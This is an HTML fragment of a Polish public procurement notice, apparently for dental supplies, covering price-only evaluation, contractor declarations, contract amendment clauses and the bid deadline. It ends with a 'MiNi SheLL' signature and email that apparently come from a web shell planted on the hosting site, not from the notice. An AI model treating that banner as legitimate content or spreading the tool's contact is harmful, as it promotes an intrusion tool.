stomatologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">najniższa cena</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania – Załącznik nr 4 do SWZ<br/>Oświadczenie Wykonawcy składane w związku z art.7 ust.1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U.2022 poz.835)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp- wstępne, do oferty<br/>na wezwanie: Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> zamawiający nie wymaga <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku, Wykonawców ubiegających się wspólnie o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3. Wykonawca, składa wraz z ofertą dokument pełnomocnictwa zawierający w szczególności wskazanie:<br/>postępowania o zamówienie publiczne, którego dotyczy, Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego Pełnomocnika oraz zakres jego umocowania, obejmujący przede wszystkim:<br/>1) reprezentowanie w postępowaniu o udzielenie zamówienia publicznego;<br/>2) zaciąganie zobowiązań;<br/>3) złożenie oferty wspólnie;<br/>4) prowadzenie korespondencji i podejmowanie zobowiązań związanych z postępowaniem<br/>o zamówienie publiczne.<br/>4. Dokument pełnomocnictwa musi być podpisany w imieniu wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia, w tym Wykonawcę ustanowionego jako Pełnomocnika (przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców).<br/>5. W przypadku oceny spełniania warunków przetargowych przez podmioty występujące wspólnie warunki te będą zsumowane w celu łącznej oceny.<br/>6. Nie dopuszcza się uczestnictwa danego Wykonawcy w więcej niż jednej grupie podmiotów występujących wspólnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. W przypadku zaistnienia okoliczności opisanych w § 10 ust. 3 niniejszej umowy, Strony postanawiają, iż na uzasadniony wniosek Wykonawcy, dokonają zmiany wynagrodzenia w wypadku wystąpienia przesłanek wskazanych w art. 436 pkt 4) ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, tj. zmiany:<br/>a)	stawki podatku od towarów i usług oraz podatku akcyzowego;<br/>b)	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę;<br/>c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne;<br/>d)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z 04 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. poz. 2215 oraz z 2019 r. poz. 1074 i 1572)<br/>2. Zmiana wysokości wynagrodzenia obowiązywać będzie po podpisaniu stosownego Aneksu do umowy, z zastrzeżeniem zapisów ustępów poniżej. <br/> 3. W wypadku zmiany, o której mowa w ust. 1 lit. a) powyżej wartość netto wynagrodzenia <br/> Wykonawcy nie zmieni się, a określona wartość brutto wynagrodzenia zostanie <br/> wyliczona na podstawie nowych przepisów. Nowa stawka podatku od towarów i usług obowiązuje <br/> z dniem wejścia w życie przepisów ją zmieniających i nie wymaga sporządzenia pomiędzy stronami <br/> aneksu.<br/>4. W przypadku zmiany, o której mowa w ust 1 lit. b) powyżej wynagrodzenie Wykonawcy ulegnie <br/> zmianie o wartość wzrostu całkowitego kosztu Wykonawcy wynikającą ze zwiększenia <br/> wynagrodzeń osób bezpośrednio wykonujących zamówienie do wysokości aktualnie <br/> obowiązującego minimalnego wynagrodzenia, z uwzględnieniem wszystkich obciążeń <br/> publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia.<br/>5.	W przypadku zmiany, o którym mowa w ust 1 lit. c) powyżej wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy, jaką będzie on zobowiązany dodatkowo ponieść w celu uwzględnienia tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób bezpośrednio wykonujących zamówienie na rzecz Zamawiającego.<br/>6.	W przypadku zmiany, o którym mowa w ust 1 lit. d) powyżej wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy, jaką będzie on zobowiązany dodatkowo ponieść w celu uwzględnienia tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób bezpośrednio wykonujących zamówienie na rzecz Zamawiającego.<br/>7.	Za wyjątkiem sytuacji, o której mowa w ust. 1 lit. a) powyżej, wprowadzenie zmian aneksem, zgodnie z ust. 3-6 powyżej, wymaga złożenia przez Wykonawcę pisemnego wskazania zmian i wyliczenia wpływu zmian, o jakich mowa w ust. 1 powyżej, na koszty wykonania zamówienia, wyznaczając stosowny termin do akceptacji zmian, nie krótszy niż 30 dni od otrzymania uzasadnionej, pisemnej propozycji przez Zamawiającego. Zmiana ta jest możliwa po 12 miesiącach od dnia zawarcia umowy i jest możliwa wyłącznie w stosunku do niewykonanej części umowy w przypadku udowodnienia przez Wykonawcę, że wskazana zmiana ma wpływ na koszty wykonania umowy.<br/>W przypadku, gdyby realizacja umowy po zmianie cen byłaby nadmiernym obciążeniem finansowym dla Zamawiającego, Zamawiający może odmówić podpisania aneksu a strony ustalą warunki rozwiązania umowy (w braku porozumienia umowa ulegnie rozwiązaniu z upływem dwumiesięcznego okresu wypowiedzenia, w trakcie którego, jeżeli zamówienia cząstkowe będą składane, zastosowanie znajdą ceny dotychczasowe, za wyjątkiem cen wynikających ze wzrostu stawek podatku VAT).<br/>8.	Zmiany umowy mogą nastąpić również w przypadku:<br/> (ograniczona ilośc znaków- opis we wzorze umowy) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/; https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-14 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com